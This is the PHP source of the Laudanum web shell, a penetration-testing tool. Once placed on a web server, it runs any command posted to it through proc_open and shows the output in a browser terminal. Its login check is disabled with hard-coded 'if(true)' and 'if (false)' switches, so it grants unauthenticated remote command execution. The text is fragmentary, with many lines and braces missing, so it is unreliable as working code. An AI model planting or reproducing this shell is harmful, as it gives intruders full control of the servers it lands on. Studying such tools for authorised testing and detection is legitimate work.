*** Copyright 2014 by Kevin Johnson and the Laudanum Team
*** This file provides shell access to the system. It is built based on the 2.1
*** version of PHPShell which is Copyright (C) 2000-2005 Martin Geisler
*** <mgeisler[at]mgeisler.net>
*** Updated by Tim Medin
*** This program is free software; you can redistribute it and/or
*** modify it under the terms of the GNU General Public License
*** as published by the Free Software Foundation; either version 2
*** of the License, or (at your option) any later version.
*** This program is distributed in the hope that it will be useful,
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
*** GNU General Public License for more details.
*** You can get a copy of the GNU General Public License from this
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
*** You can also write to the Free Software Foundation, Inc., 59 Temple
*** Place - Suite 330, Boston, MA 02111-1307, USA.
***************************************************************************** */
include 'ipcheck.php';
/* This error handler will turn all notices, warnings, and errors into fatal
* errors, unless they have been suppressed with the @-operator. */
function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
/* The @-opertor (used with chdir() below) temporarely makes
* error_reporting() return zero, and we don't want to die in that case.
* We do note the error in the output, though. */
if (error_reporting() == 0) {
$_SESSION['output'] .= $errstr . "\n";
} else {
<title>Laudanum PHP Shell Access</title>
<h1>Fatal Error!</h1>
<p><b>' . $errstr . '</b></p>
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
Copyright &copy; 2014, <a
href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
// set_error_handler('wpl_error_handler');
function logout() {
$_SESSION = array('authenticated' => false);
if (isset($_COOKIE[session_name()]))
setcookie(session_name(), '', time()-42000, '/');
function wpl_stripslashes_deep($value) {
if (is_array($value))
return array_map('stripslashes_deep', $value);
return stripslashes($value);
if (get_magic_quotes_gpc())
$_POST = stripslashes_deep($_POST);
/* Initialize some variables we need again and again. */
//$username = isset($_POST['username']) ? $_POST['username'] : '';
//$password = isset($_POST['password']) ? $_POST['password'] : '';
//$nounce = isset($_POST['nounce']) ? $_POST['nounce'] : '';
$command = isset($_POST['command']) ? $_POST['command'] : '';
$rows = isset($_POST['rows']) ? $_POST['rows'] : 24;
$columns = isset($_POST['columns']) ? $_POST['columns'] : 80;
///* Default settings --- these settings should always be set to something. */
//$default_settings = array('home-directory' => '.');
///* Merge settings. */
//$ini['settings'] = array_merge($default_settings, $ini['settings']);
/* Delete the session data if the user requested a logout. This leaves the
* session cookie at the user, but this is not important since we
* authenticates on $_SESSION['authenticated']. */
if (isset($_POST['logout']))
///* Attempt authentication. */
//if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] &&
// isset($ini['users'][$username])) {
// if (strchr($ini['users'][$username], ':') === false) {
// // No seperator found, assume this is a password in clear text.
// $_SESSION['authenticated'] = ($ini['users'][$username] == $password);
// } else {
// list($fkt, $salt, $hash) = explode(':', $ini['users'][$username]);
// $_SESSION['authenticated'] = ($fkt($salt . $password) == $hash);
// }
/* Attempt authentication. */
if (isset($_SESSION['nounce']) && $nounce == $_SESSION['nounce'] && isset($users[$username]))
$_SESSION['authenticated'] = ($users[$username] == hash("sha1", $password));
/* Enforce default non-authenticated state if the above code didn't set it
* already. */
if (!isset($_SESSION['authenticated']))
$_SESSION['authenticated'] = false;
if(true) {
//if ($_SESSION['authenticated']) {
/* Initialize the session variables. */
if (empty($_SESSION['cwd'])) {
$_SESSION['cwd'] = '.';
$_SESSION['history'] = array();
$_SESSION['output'] = '';
if (!empty($command)) {
/* Save the command for late use in the JavaScript. If the command is
* already in the history, then the old entry is removed before the
* new entry is put into the list at the front. */
if (($i = array_search($command, $_SESSION['history'])) !== false)
array_unshift($_SESSION['history'], $command);
/* Now append the commmand to the output. */
$_SESSION['output'] .= '$ ' . $command . "\n";
/* Initialize the current working directory. */
if (preg_match('/^[[:blank:]]*cd[[:blank:]]*$/', $command)) {
$_SESSION['cwd'] = realpath($ini['settings']['home-directory']);
} elseif (preg_match('/^[[:blank:]]*cd[[:blank:]]+([^;]+)$/', $command, $regs)) {
/* The current command is a 'cd' command which we have to handle
* as an internal shell command. */
if ($regs[1]{0} == '/') {
/* Absolute path, we use it unchanged. */
$new_dir = $regs[1];
} else {
/* Relative path, we append it to the current working
* directory. */
$new_dir = $_SESSION['cwd'] . '/' . $regs[1];
/* Transform '/./' into '/' */
while (strpos($new_dir, '/./') !== false)
$new_dir = str_replace('/./', '/', $new_dir);
/* Transform '//' into '/' */
while (strpos($new_dir, '//') !== false)
$new_dir = str_replace('//', '/', $new_dir);
/* Transform 'x/..' into '' */
while (preg_match('|/\.\.(?!\.)|', $new_dir))
$new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
if ($new_dir == '') $new_dir = '/';
/* Try to change directory. */
if (@chdir($new_dir)) {
$_SESSION['cwd'] = $new_dir;
} else {
$_SESSION['output'] .= "cd: could not change to: $new_dir\n";
} elseif (trim($command) == 'exit') {
} else {
/* The command is not an internal command, so we execute it after
* changing the directory and save the output. */
// We canot use putenv() in safe mode.
if (!ini_get('safe_mode')) {
// Advice programs (ls for example) of the terminal size.
putenv('ROWS=' . $rows);
putenv('COLUMNS=' . $columns);
/* Alias expansion. */
$length = strcspn($command, " \t");
$token = substr($command, 0, $length);
if (isset($ini['aliases'][$token]))
$command = $ini['aliases'][$token] . substr($command, $length);
$io = array();
$p = proc_open($command,
array(1 => array('pipe', 'w'),
2 => array('pipe', 'w')),
/* Read output sent to stdout. */
while (!feof($io[1])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
/* Read output sent to stderr. */
while (!feof($io[2])) {
$_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
/* Build the command history for use in the JavaScript */
if (empty($_SESSION['history'])) {
$js_command_hist = '""';
} else {
$escaped = array_map('addslashes', $_SESSION['history']);
$js_command_hist = '"", "' . implode('", "', $escaped) . '"';
<title>Laudanum Shell</title>
<link rel="stylesheet" href="style.css" type="text/css">
<script type="text/javascript">
<?php if (true) { ?>
var current_line = 0;
var command_hist = new Array(<?php echo $js_command_hist ?>);
var last = 0;
function key(e) {
if (!e) var e = window.event;
if (e.keyCode == 38 && current_line < command_hist.length-1) {
command_hist[current_line] = document.shell.command.value;
document.shell.command.value = command_hist[current_line];
if (e.keyCode == 40 && current_line > 0) {
command_hist[current_line] = document.shell.command.value;
document.shell.command.value = command_hist[current_line];
function init() {
document.shell.setAttribute("autocomplete", "off");
document.shell.output.scrollTop = document.shell.output.scrollHeight;
<?php } else { ?>
function init() {
<?php } ?>
<body onload="init()">
<h1>Laudanum Shell</h1>
<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
if (false) {
/* Genereate a new nounce every time we preent the login page. This binds
* each login to a unique hit on the server and prevents the simple replay
* attack where one uses the back button in the browser to replay the POST
* data from a login. */
$_SESSION['nounce'] = mt_rand();
if (false)
echo ' <p class="error">Login failed, please try again:</p>' . "\n";
echo " <p>Please login:</p>\n";
<p>Username: <input name="username" type="text" value="<?php echo $username
<p>Password: <input name="password" type="password"></p>
<p><input type="submit" value="Login"></p>
<input name="nounce" type="hidden" value="<?php echo $_SESSION['nounce']; ?>">
<?php } else { /* Authenticated. */ ?>
<legend>Current Working Directory: <code><?php
echo htmlspecialchars($_SESSION['cwd'], ENT_COMPAT, 'UTF-8');
<div id="terminal">
<textarea name="output" readonly="readonly" cols="<?php echo $columns ?>" rows="<?php echo $rows ?>">
$lines = substr_count($_SESSION['output'], "\n");
$padding = str_repeat("\n", max(0, $rows+1 - $lines));
echo rtrim($padding . $_SESSION['output']);
<p id="prompt">
$&nbsp;<input name="command" type="text"
onkeyup="key(event)" size="<?php echo $columns-2 ?>" tabindex="1">
<span style="float: right">Size: <input type="text" name="rows" size="2"
maxlength="3" value="<?php echo $rows ?>"> &times; <input type="text"
name="columns" size="2" maxlength="3" value="<?php echo $columns
<input type="submit" value="Execute Command">
<input type="submit" name="logout" value="Logout">
<?php } ?>
Copyright &copy; 2014, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
Updated by Tim Medin.<br/>
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.